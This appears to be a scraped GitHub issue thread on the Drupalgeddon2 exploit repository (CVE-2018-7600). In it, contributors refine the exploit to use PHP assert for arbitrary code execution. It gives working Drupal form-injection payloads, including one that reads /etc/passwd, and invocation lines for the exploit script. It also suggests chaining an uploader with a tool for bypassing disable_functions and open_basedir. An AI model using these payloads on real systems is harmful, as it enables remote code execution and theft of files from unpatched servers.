Assert is the new sexy - Githubissues

dreadlocked / Drupalgeddon2

Exploit for Drupal v7.x + v8.x (Drupalgeddon 2 / CVE-2018-7600 / SA-CORE-2018-002)

579 stars 173 forks source link

Assert is the new sexy #19

Closed X-C3LL closed 6 years ago

X-C3LL commented 6 years ago

Hi!

Instead of use exec or passthru is far better to use assert, so you can eval custom PHP code. In this way you can avoid disable_functions issues :).

Example of a valid payload:

{'q':'user/password', 'name[0][#post_render][]':'assert', 'name[0][#markup]': $COMMAND . ' !== "X-C3LL";', 'name[0][#type]':'markup'}

So you can do things like:


{'q':'user/password', 'name[0][#post_render][]':'assert', 'name[0][#markup]':'readfile("/etc/passwd") !== "X-C3LL";', 'name[0][#type]':'markup'}

X-C3LL commented 6 years ago

Indeed, with assert you can create an uploader and then use Chankro (https://github.com/TarlogicSecurity/Chankro) to bypass disable_functions & open_basedir.

dreadlocked commented 6 years ago

In progress... by the way, you can use "do-not-use.rb" and use whatever php method you want:

ruby do-not-use.rb https://localhost 7 command phpmethod
ruby do-not-use.rb https://localhost 8 command phpmethod

Good luck!

dreadlocked commented 6 years ago

Investigating why this only works on some specific cases.

X-C3LL commented 6 years ago

Tonight I am going to try to triage the issue.

My environment is: PHP Version 7.0.27-0 Debian 4.9.82-1+deb9u3 Drupal version 7.57

X-C3LL commented 6 years ago

In a PHP 7 installed by default it works (Drupal 7.57): sudo apt-get install libapache2-mod-php7.0 php7.0 php7.0-cli php7.0-common php7.0-json php7.0-mysql

But it does not work with PHP 5.